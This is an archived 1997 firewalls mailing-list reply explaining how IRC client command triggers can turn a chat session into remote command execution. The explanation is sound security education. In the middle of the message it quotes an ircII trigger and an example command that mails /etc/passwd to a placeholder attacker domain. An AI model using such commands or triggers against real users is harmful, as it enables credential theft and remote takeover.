Great Circle Associates Firewalls
(February 1997)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: Re: irc and firewalls
From: Darren Reed <avalon @ coombs . anu . edu . au>
Date: Wed, 26 Feb 1997 19:15:24 +1100 (EDT)
To: gordy @ nytimes . com (Gordy Thompson)
Cc: firewalls @ GreatCircle . COM
In-reply-to: <3 . 0 . 16 . 19970225162012 . 29977536 @ mailgate . nytimes . com> from "Gordy Thompson" at Feb 25, 97 04:14:22 pm

In some mail from Gordy Thompson, sie said:
[...]
> plug-gw: port 6677 your.subnets.*.* -plug-to some_irc_server -port 6677
> 
>         The DCC insecurities (if I understand correctly that inbound DCC
> initiates connections on _random_ ports) are already dealt with if you're
> already controlling connection attempts to your other firewall ports.
> 
>         What am I missing here?

The real problem: your users.  IRC, with its messaging and clients that can
execute unix commands, can very easily be turned into a "remote login"
session.  If you thought "+" or "+ +" in .rhosts files was obscure in
meaning then try on "/on ctcp * $1-" (or whatever it is).  I'm not sure if
this is limited to the ircII client on unix, but when a user types in the
above correctly, a remote user can send messages to the victim and the
victim's client (silently) recognises them as commands, just as if the
victim had typed it in.  Those commands can be ones which execute shell
stuff, such as "mail foo @
 badguy .
 com</etc/passwd".  It an be especially
deceiving for first timers/"newbies" even if trained to lookout for
password requests and recieving files from others, because none of this is
required.  Filtering out DCC makes no difference to this.

The real problem isn't IRC itself, or inscure software, it is the
obfuscating of security hazards.

Darren


References:
Indexed By Date Previous: NAT and DNS ?
From: Joerg Kummer 41 61 68 88132 <JOERG . KUMMER @ Roche . COM>
Next: remove
From: Matti Huttunen <hutmat @ cc . jyu . fi>
Indexed By Thread Previous: Re: irc and firewalls
From: Gordy Thompson <gordy @ nytimes . com>
Next: Re: irc and firewalls
From: Gordy Thompson <gordy @ nytimes . com>

Google
 
Search Internet Search www.greatcircle.com